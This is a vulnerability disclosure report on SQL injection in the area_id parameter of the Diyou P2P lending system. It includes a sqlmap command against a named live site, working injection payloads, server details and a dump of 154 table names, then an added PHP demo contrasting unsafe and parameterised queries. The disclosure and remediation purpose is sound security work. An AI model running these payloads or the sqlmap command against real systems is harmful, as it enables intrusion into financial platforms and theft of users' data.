
Diyou (帝友) P2P Lending System SQL Injection, Affecting All Versions #1

Description

### Brief description:

=。=

### Detailed description:

Module: province/city information linkage plugin (affects all versions, V4.0 and 3.1).

The province/city linkage plugin reads its data from the database on the backend; the province/city/district variables only need to be cast to int!

Location: `./?plugins&q=areas&area_id=174`

http://www.diyou.cc/?plugins&q=areas&area_id=174

The GET parameter `area_id` is not effectively filtered, which leads to SQL injection.

This is a notice that an injection point exists; no further testing was done. Fix it quickly, quickly, quickly!

```
python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.cc

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: area_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: plugins&q=areas&area_id=174 AND 8880=8880

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: plugins&q=areas&area_id=174 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] www.diyou.cc

Database: www.diyou.cc
[154 tables]
+-----------------------------+
| diyou_account               |
| diyou_account_balance       |
| diyou_account_bank          |
| diyou_account_cash          |
| diyou_account_fee           |
| diyou_account_fee_type      |
| diyou_account_log           |
| diyou_account_payment       |
| diyou_account_recharge      |
| diyou_account_users         |
| diyou_account_users_bank    |
| diyou_account_web           |
| diyou_approve               |
| diyou_approve_edu           |
| diyou_approve_edu_id5       |
| diyou_approve_id5           |
| diyou_approve_realname      |
| diyou_approve_sms           |
| diyou_approve_smslog        |
| diyou_approve_video         |
| diyou_areas                 |
| diyou_articles              |
| diyou_articles_pages        |
| diyou_articles_type         |
| diyou_attestations          |
| diyou_attestations_type     |
| diyou_attestations_user     |
| diyou_borrow                |
| diyou_borrow_activity       |
| diyou_borrow_amount         |
| diyou_borrow_amount_apply   |
| diyou_borrow_amount_log     |
| diyou_borrow_amount_type    |
| diyou_borrow_apply          |
| diyou_borrow_auto           |
| diyou_borrow_autolog        |
| diyou_borrow_care           |
| diyou_borrow_change         |
| diyou_borrow_count          |
| diyou_borrow_count_log      |
| diyou_borrow_credit         |
| diyou_borrow_fee            |
| diyou_borrow_fee_loan       |
| diyou_borrow_fee_log        |
| diyou_borrow_fee_type       |
| diyou_borrow_flag           |
| diyou_borrow_frost          |
| diyou_borrow_newtype        |
| diyou_borrow_preview        |
| diyou_borrow_recover        |
| diyou_borrow_repay          |
| diyou_borrow_roam           |
| diyou_borrow_style          |
| diyou_borrow_tender         |
| diyou_borrow_tender_auto    |
| diyou_borrow_tender_autolog |
| diyou_borrow_tender_web     |
| diyou_borrow_type           |
| diyou_borrow_verify         |
| diyou_borrow_vouch          |
| diyou_borrow_vouch_recover  |
| diyou_borrow_vouch_repay    |
| diyou_comment               |
| diyou_comments              |
| diyou_credit                |
| diyou_credit_class          |
| diyou_credit_log            |
| diyou_credit_rank           |
| diyou_credit_type           |
| diyou_dw_activity_review    |
| diyou_email                 |
| diyou_email_log             |
| diyou_email_port            |
| diyou_email_sendlog         |
| diyou_group                 |
| diyou_group_articles        |
| diyou_group_comments        |
| diyou_group_log             |
| diyou_group_member          |
| diyou_group_type            |
| diyou_linkages              |
| diyou_linkages_class        |
| diyou_linkages_type         |
| diyou_links                 |
| diyou_links_type            |
| diyou_message               |
| diyou_message_receive       |
| diyou_modules               |
| diyou_phone                 |
| diyou_phone_log             |
| diyou_phone_port            |
| diyou_phone_smslog          |
| diyou_rating_assets         |
| diyou_rating_company        |
| diyou_rating_contact        |
| diyou_rating_educations     |
| diyou_rating_finance        |
| diyou_rating_houses         |
| diyou_rating_info           |
| diyou_rating_job            |
| diyou_remind                |
| diyou_remind_log            |
| diyou_remind_type           |
| diyou_remind_user           |
| diyou_scrollpic             |
| diyou_scrollpic_type        |
| diyou_site                  |
| diyou_site_menu             |
| diyou_sms_type              |
| diyou_spread_add            |
| diyou_spread_log            |
| diyou_spreads_log           |
| diyou_spreads_set           |
| diyou_spreads_users         |
| diyou_sysauto_auto          |
| diyou_sysauto_log           |
| diyou_system                |
| diyou_system_type           |
| diyou_trust                 |
| diyou_trust_borrow          |
| diyou_trust_cash            |
| diyou_trust_gopay           |
| diyou_trust_ips             |
| diyou_trust_recharge        |
| diyou_trust_repay           |
| diyou_trust_tender          |
| diyou_ucenter               |
| diyou_ucenter_set           |
| diyou_users                 |
| diyou_users_admin           |
| diyou_users_admin_login     |
| diyou_users_admin_type      |
| diyou_users_adminlog        |
| diyou_users_care            |
| diyou_users_care_user       |
| diyou_users_email           |
| diyou_users_email_log       |
| diyou_users_examines        |
| diyou_users_friends         |
| diyou_users_friends_invite  |
| diyou_users_friends_type    |
| diyou_users_info            |
| diyou_users_log             |
| diyou_users_qq              |
| diyou_users_rebut           |
| diyou_users_reglog          |
| diyou_users_return_log      |
| diyou_users_set             |
| diyou_users_sina            |
| diyou_users_type            |
| diyou_users_upfiles         |
| diyou_users_vip             |
| diyou_users_viplog          |
| diyou_users_visit           |
+-----------------------------+
```

### Proof of vulnerability:

[![QQ图片20140514000027.jpg](https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg)](https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg)
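The fix the report calls for ("the province/city/district variables only need to be cast to int") shown as working code. This is an added example and not code from the Diyou system or from the report: a hypothetical `areas` lookup handler written for PHP 7+ against an in-memory SQLite database through PDO (it assumes the `pdo_sqlite` extension is available). The column names, sample rows and function names are constructed for the demo; only the table name `diyou_areas` comes from the report. The unsafe variant reproduces the defect the report describes (the raw GET value concatenated into the query text); the hardened variant validates the parameter as a plain integer before it reaches SQL and binds it in a prepared statement, which closes the boolean-based, UNION and time-based variants sqlmap listed at once, because no attacker-controlled text is ever interpreted as SQL.

```php
<?php
// Added example, not the Diyou project's code. A hypothetical "areas"
// linkage handler in its unsafe shape and its hardened shape.
// Runs offline against an in-memory SQLite database (assumes pdo_sqlite).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed schema and rows for the demo; the real column layout is unknown.
$db->exec('CREATE TABLE diyou_areas (area_id INTEGER PRIMARY KEY, parent_id INTEGER, name TEXT)');
$db->exec("INSERT INTO diyou_areas VALUES
    (174, 0,   'constructed-province'),
    (175, 174, 'constructed-city-a'),
    (176, 174, 'constructed-city-b')");

// UNSAFE: the GET value is pasted straight into the SQL text, so anything
// that is not a bare number becomes part of the query. This is the defect
// the report describes for area_id.
function areas_unsafe(PDO $db, string $areaId): array
{
    $sql = 'SELECT area_id, name FROM diyou_areas WHERE parent_id = ' . $areaId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: area_id is an integer identifier, so accept only a string of
// digits of sane length, reject everything else (do not try to "clean" it),
// and bind the value as an integer in a prepared statement.
function areas_safe(PDO $db, string $areaId): array
{
    if (!ctype_digit($areaId) || strlen($areaId) > 10) {
        // In a web handler this is where a 400 response and a log entry belong;
        // the rejected value is truncated so the log itself cannot be abused.
        error_log('areas: rejected non-integer area_id: ' . substr($areaId, 0, 64));
        return [];
    }
    $stmt = $db->prepare('SELECT area_id, name FROM diyou_areas WHERE parent_id = :pid');
    $stmt->bindValue(':pid', (int) $areaId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo inputs (constructed): a legitimate lookup and a tautology of the kind
// sqlmap's boolean-based test sends, to show the difference in behaviour.
$legit   = '174';
$tainted = '174 OR 1=1';

printf("unsafe, legit value:   %d rows\n", count(areas_unsafe($db, $legit)));   // 2
printf("unsafe, tainted value: %d rows (whole table returned)\n", count(areas_unsafe($db, $tainted))); // 3
printf("safe,   legit value:   %d rows\n", count(areas_safe($db, $legit)));     // 2
printf("safe,   tainted value: %d rows (input rejected)\n", count(areas_safe($db, $tainted))); // 0
```

Run it with `php areas_demo.php` (any file name). The row counts make the point the report is making: with the value interpolated, a tampered parameter changes the query and returns rows it should not; with validation plus a bound integer parameter, a tampered value is refused before any SQL runs. The allow-list check (`ctype_digit`) is the important half of the fix for an ID parameter; `(int)` alone would silently turn `174 OR 1=1` into `174` and hide tampering that should be logged.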